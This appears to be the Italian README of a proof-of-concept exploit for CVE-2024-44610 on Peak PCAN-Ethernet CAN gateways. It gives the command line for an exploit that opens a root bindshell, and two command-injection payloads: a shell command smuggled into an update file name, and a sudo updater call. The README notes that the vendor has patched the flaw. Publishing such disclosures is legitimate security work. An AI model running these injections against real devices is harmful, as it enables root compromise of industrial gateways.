
CVE-2024-44610: Exploit remoto autenticato di root nei gateway Peak PCAN-Ethernet CAN-(FD)
Questo repository contiene un exploit Proof-of-Concept (PoC) che esegue codice come root sui gateway Ethernet Peak. Richiede che tu conosca le credenziali dell'interfaccia web.
Il produttore ha rapidamente fornito firmware corretto:
Compila il programma usando Golang e poi esegui come segue:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
Se l'exploit ha successo, verrà avviata una bindshell sul dispositivo come root. Puoi vedere due schermate in fondo a questa pagina.
Le opzioni hanno il seguente significato:
Sebbene anche la versione non-FD sia vulnerabile, ciò ha poca importanza pratica poiché questi dispositivi non implementano aggiornamenti firmware firmati, e quindi potresti semplicemente caricare il tuo firmware modificato.
Vengono utilizzate due vulnerabilità di injection di comandi shell:
È possibile includere un comando shell nel nome del file del pacchetto di aggiornamento che viene caricato nell'interfaccia web, ad esempio:
test';ping 1.1.1.1;'.raucb
Il comando verrà eseguito come utente www-data, che esegue il webserver. Il nome del file deve avere l'estensione corretta (tar o raucb a seconda del dispositivo)
Il binario esegue internamente system sul nome file fornito, purché esista. Può essere sfruttato come segue:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
Poiché questo binario può essere eseguito tramite sudo, è possibile eseguire il comando come root.
Dispositivo FD:

Dispositivo non-FD:
